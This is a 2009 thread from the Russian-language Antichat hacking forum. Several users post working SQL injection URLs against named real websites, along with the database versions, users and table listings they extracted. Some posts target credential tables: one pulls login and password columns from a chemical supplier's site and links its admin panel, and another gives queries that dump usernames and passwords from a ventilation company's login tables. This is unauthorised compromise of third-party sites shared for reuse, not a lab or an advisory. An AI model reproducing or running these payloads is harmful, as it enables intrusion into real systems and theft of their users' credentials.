ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10441  
Старый 16.08.2009, 22:04
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

http://www.climamaison.com/gp_produit.php?Prod=71+union+select+1,concat_ws(0x 2a,version(),user(),database())

5.0.32-Debian_7etch10-log climamaisoncom@localhost climamaisoncom

http://www.gmb-tuning.nl/index.php?p=Nieuws&id=80+union+select+1,2,3,4,5,co ncat_ws(0x2a,version(),database(),user()),7

5.0.32-Debian_7etch6-log gladershop_gmb gladershop_gmb@localhost
 
Ответить с цитированием

  #10442  
Старый 17.08.2009, 03:50
Noizless
Новичок
Регистрация: 26.07.2009
Сообщений: 6
Провел на форуме:
35784

Репутация: 18
По умолчанию

Код:
http://www.skidkivtule.ru/advices.php?id=20&row=-89+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/*
Database Version: 4.1.22-log
Database name: wwwskidkivtuleru
User name: skidkivt@localhost

Код:
http://www.kfp.com.ua/vippred_info.php?id=19+union+select+1,2,concat_ws(0x3a,version(),database(),user())+limit+1,1/*
Database Version: 4.0.27-standard-log
Database name: VKFK
User name: vkfk@localhost

Код:
http://www.parta.kiev.ua/club/index.php?show=ank&id=-599+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--
Database Version: 5.0.51a-community
Database name: photoua_parta
User name: photoua_parta@localhost
 
Ответить с цитированием

  #10443  
Старый 17.08.2009, 04:32
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

www.smirs.com он-лайн шоп часов
Blind SQL inj

Цитата:
http://www.smirs.com/product_info.php?products_id=340+and+substring(ver sion(),1,1)=4/*
4ая ветка
 
Ответить с цитированием

  #10444  
Старый 17.08.2009, 08:38
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.tdrz.ru/next.php?id=84%20union%20select%20version()--

Database Version: 5.0.32-Debian_7etch8
Database name: tdrzru
User name: tdrzru@localhost
 
Ответить с цитированием

  #10445  
Старый 17.08.2009, 10:51
mol0t
Познающий
Регистрация: 08.07.2009
Сообщений: 43
Провел на форуме:
1369392

Репутация: 262
По умолчанию

ТИЦ: 10
PR: 4
Код:
http://www.kanda.com/readnews.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10--
kanda_kandadb:5.0.45:kanda@70.32.114.77
вывод в заголовке
http://www.kanda.com/admin/login.php
 
Ответить с цитированием

  #10446  
Старый 17.08.2009, 18:14
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.polihim.info/products/list.php?id=13-13%20UNION+SELECT%20concat_ws(0x3a,login,password) %20FROM+polihim.access--

Выводит логин и пароль =) (выкладывать правила запрещают =))
И если поковырять то можно еще хеш от форума вобловского отрыть...

Админка: http://www.polihim.info/adm/

Ах да.

Version: 5.0.77
name: polihim
User name: art@localhost
 
Ответить с цитированием

  #10447  
Старый 17.08.2009, 18:44
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.stvasilios.org/news/article.php?id=-580+union+select+1,version(),3,4,5/*
Database Version: 5.0.45-community-nt
Database name: stvasilios
User name: parstvasilios@vmwinhost2.inetmin
 
Ответить с цитированием

  #10448  
Старый 17.08.2009, 18:51
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Кинотеатр "Космос", г. Новосибирск
Цитата:
http://www.kosmos-nsk.ru/index.php?page=film&id=-451+union+select+1,2,3,4,5,concat_ws(0x3a,database (),user(),version()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20
Код:
kosmos_base:kosmos_user@localhost:5.0.45
 
Ответить с цитированием

  #10449  
Старый 17.08.2009, 22:26
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

mssqli
Код:
http://www.tuoteuutiset.fi/info.cfm/id/38/mag/2+or+1=@@version--
version()
Цитата:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
db_name() [tuxml]
system_user [www]
tables:
Код:
bannerJoin
brand
additionalNews
company
companyBrandJoin
companyDescription
companyDigital
companyDigitalLog
companyEmail
companyInfo
companyJoin
companyProductTypeJoin
companySearch
companyUrl
companyWhitePaper
contact
contactCompany
customerEmailFailed
customerEmails
dtproperties
event
eventJoin
expertArticle
holddups
infoBase
infoBaseJoin
infoBaseRows
itemViews
keyaccount
link
linkGroup
linkGroupJoin
linkJoin
magazine
magazineIssues
magazineOrders
news
newsJoin
newsletter
newsProductTypeJoin
nimppari
pdf
picture
product
productClass
productClassJoin
productData
productJoin
productProductTypeJoin
productProductTypeJoinHoldKey
productType
productTypeJoin
rating
spotNews
spotNewsGroup
spotNewsJoin
sysconstraints
===================================
Код:
http://www.proventilation.com/products/productDetail.asp?id=9+or+1=@@version--
version()
Цитата:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() [uniwashInc]
system_user [uniwashInc]
tables:
Код:
tblRepLogin
D99_Tmp
dtproperties
FORUM_A_REPLY
FORUM_A_TOPICS
FORUM_ALLOWED_MEMBERS
FORUM_BADWORDS
FORUM_CATEGORY
FORUM_CONFIG_NEW
FORUM_FORUM
FORUM_GROUP_NAMES
FORUM_GROUPS
FORUM_MEMBERS
FORUM_MEMBERS_PENDING
FORUM_MODERATOR
FORUM_NAMEFILTER
FORUM_REPLY
FORUM_SUBSCRIPTIONS
FORUM_TOPICS
FORUM_TOTALS
MSysCompactError
sysconstraints
syssegments
tblActualApplication
tblApplication
tblApplicationMachine
tblApplicationType
tblBullets
tblComments
tblCustomer
tblCustomModel
tblDetail
tblDrawings
tblItemList
tblItemListTemp
tblItemXref
tblLinks
tblLogin
tblMemberships
tblMisc
tblModel
tblModel2
tblNewProduct
tblProductAppXref
tblProductHeader
tblProducts
tblProductType
tblProductTypes
tblProductXref
tblProImage
tblQuote
tblQuoteModel
tblQuoteOption
tblRepCustomer
tblRepEmail
tblRepModelXref
tblSalesData
tblSalesData2
tblTestamonials
tblTradeShows
tblUBEmail
Код:
http://www.proventilation.com/products/productDetail.asp?id=9+or+1=(select+top+1+cast(id+as+nvarchar)%2B%27%3A%27%2Bcast(firstName+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+tblLogin)--
Код:
http://www.proventilation.com/products/productDetail.asp?id=9+or+1=(select+top+1+cast(ID+as+nvarchar)%2B%27%3A%27%2Bcast(userName+as+nvarchar)%2B%27%3A%27%2Bcast(passwords+as+nvarchar)+from+tblRepLogin)--
===================================
Код:
http://www.auspirit.com/au/aspirit/productdetail.asp?ID=40+or+1=@@version--
version()
Цитата:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() [vs112407_1]
system_user [vs112407_1_dbo]
tables:
Код:
tliBannerInstance
tblMMClickThru
tliSeminarDate
AusSpirit
dtproperties
SASImport
SASImportold
sysconstraints
syssegments
tblMMAccountFields
tblMMAccounts
tblMMAdminRights
tblMMAdminSections
tblMMClient
tblMMFieldContent
tblMMFieldTypes
tblMMImailHistory
tblMMScheduleSend
tblMMStat
tblMMTemplates
tblMMUsers
tblREmailAdministrators
tblREmailMemberVariants
tblREmailServiceMembers
tblRVariantContent
tblRVariantTypes
tldImail1_1ContentFolder
tldImail1_1DataBase
tldImail1_1EmailContent
tldImail1_1MailQue
tldImail1_1Members
tldImail2_2ContentFolder
tldImail2_2DataBase
tldImail2_2EmailContent
tldImail2_2MailQue
tldImail2_2Members
tliAdministrator
tliAdvertisement
tliAffiliate
tliAffiliateReference
tliAPTMSCompany
tliAPTMSLocation
tliAPTMSProduct
tliAuctionBids
tliAuctionCategory
tliAuctionClient
tliAuctioneerPermission
tliAuctionFeedback
tliAuctionIncrement
tliAuctionItem
tliAuctionMessage
tliAuctionOrder
tliBanner
tliBannerPosition
tliBannerTemplate
tliBannerType
tliBidType
tliBlog
tliBlogComment
tliBranchDomain
tliBrand
tliCartCustomer
tliCartOrder
tliCartPayment
tliCategory
tliContentItem
tliContentType
tliCourse
tliCruiseBooking
tliCruiseCrew
tliCruiseDate
tliCruiseSchedule
tliCurrencyConverter
tliDataPage
tliDataPageState
tliEMailClickThrough
tliEMailContent
tliEMailContentInstance
tliEMailDump
tliEMailQue
tliEMailTemplate
tliEvent
tliExchangeRates
tliForum
tliForumComment
tliForumThread
tliForumTopic
tliForumUser
tliGeneralPage
tliGeneralPageCategory
tliGMTDestination
tliGMTProduct
tliImailEmail
tliImailEmailPart
tliIndigoMenuItem
tliIndigoSummaryItem
tliIndigoSummaryItemButton
tliIndigoSummaryItemEntry
tliItinerary
tliLawFirm
tliMember
tliMemberExpertise
tliMemberGroup
===================================
Код:
http://www.chemdot.com/productdetail.cfm?id=288+or+1=@@version--
version()
Цитата:
Microsoft SQL Server 7.00 - 7.00.842 (Intel X86) Mar 2 2000 06:49:37 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() [chemdot]
system_user [NT AUTHORITY\SYSTEM]
tables:
Код:
REFERENTIAL_CONSTRAINTS
CHECK_CONSTRAINTS
admin
===================================
Код:
http://www.sooknet.com/technology/news.cfm?ID=5620+or+1=@@version--
version()
Цитата:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name() [sooknet2]
system_user [itssook]
 
Ответить с цитированием

  #10450  
Старый 18.08.2009, 00:05
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

http://www.buddhistac.org/nkn_include/nknfiledn.php?uid=1+union+select+aes_decrypt(aes_e ncrypt(concat_ws(0x2a,version(),user(),database()) ,0x71),0x71),2,3,4,5

5.0.27 budac@localhost budac


http://www.ndt.net/search/docs.php3?id=7516+union+select+concat_ws(0x2a,vers ion(),user(),database())+limit+1,1/*


5.0.24 nondestructive@localhost ndtnet
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT.XYZ